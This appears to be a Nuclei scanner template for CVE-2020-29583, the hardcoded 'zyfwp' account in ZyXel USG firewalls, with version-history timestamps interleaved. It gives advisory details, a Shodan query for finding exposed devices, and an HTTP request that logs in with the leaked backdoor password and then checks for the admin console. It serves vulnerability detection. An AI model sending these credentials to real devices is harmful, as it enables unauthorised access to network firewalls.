2023-05-25 18:18:57 +00:00
id : CVE-2020-29583
info :
name : ZyXel USG - Hardcoded Credentials
author : canberbamber
severity : critical
description : |
A hardcoded credential vulnerability was identified in the 'zyfwp' user account in some Zyxel firewalls and AP controllers. The account was designed to deliver automatic firmware updates to connected access points through FTP.
2023-09-27 15:51:13 +00:00
impact : |
An attacker can exploit this vulnerability to gain unauthorized access to the affected device, potentially leading to further compromise of the network.
2023-09-06 12:22:36 +00:00
remediation : |
Update the firmware of the ZyXel USG device to the latest version, which addresses the hardcoded credentials issue.
2023-05-25 18:18:57 +00:00
reference :
- https://www.zyxel.com/support/CVE-2020-29583.shtml
- https://support.zyxel.eu/hc/en-us/articles/360018524720-Zyxel-security-advisory-for-hardcoded-credential-vulnerability-CVE-2020-29583
- https://nvd.nist.gov/vuln/detail/CVE-2020-29583
- https://www.eyecontrol.nl/blog/undocumented-user-account-in-zyxel-products.html
2023-07-11 19:49:27 +00:00
- http://ftp.zyxel.com/USG40/firmware/USG40_4.60(AALA.1)C0_2.pdf
2023-05-25 18:18:57 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score : 9.8
cve-id : CVE-2020-29583
cwe-id : CWE-522
2023-10-31 18:27:55 +00:00
epss-score : 0.96219
2024-03-23 09:28:19 +00:00
epss-percentile : 0.99483
2023-09-06 12:22:36 +00:00
cpe : cpe:2.3:o:zyxel:usg20-vpn_firmware:4.60:*:*:*:*:*:*:*
2023-05-25 18:18:57 +00:00
metadata :
2023-06-04 08:13:42 +00:00
verified : true
2023-09-06 12:22:36 +00:00
max-request : 2
2023-07-11 19:49:27 +00:00
vendor : zyxel
product : usg20-vpn_firmware
2023-09-06 12:22:36 +00:00
shodan-query : title:"USG FLEX 100"
2023-06-03 18:56:35 +00:00
tags : cve,cve2020,ftp-backdoor,zyxel,bypass,kev
2023-05-25 18:18:57 +00:00
http :
- raw :
- |
GET /?username=zyfwp&password=PrOw!aN_fXp HTTP/1.1
Host : {{Hostname}}
- |
GET /ext-js/index.html HTTP/1.1
Host : {{Hostname}}
matchers-condition : and
matchers :
- type : word
part : body_2
words :
- 'data-qtip="Web Console'
- 'CLI'
- 'Configuration"></a>'
condition : and
- type : status
status :
- 200
2024-03-25 11:57:16 +00:00
# digest: 490a0046304402205064009da027752d122ecf0014ab308168a1bc00b4b71c52380ea84c25f8d24502207f9d7991e9122052d9ecf249bf0e2129e660d62d0a04ae025cd5e64b1d57619d:922c64590222798bb761d5b6d8e72950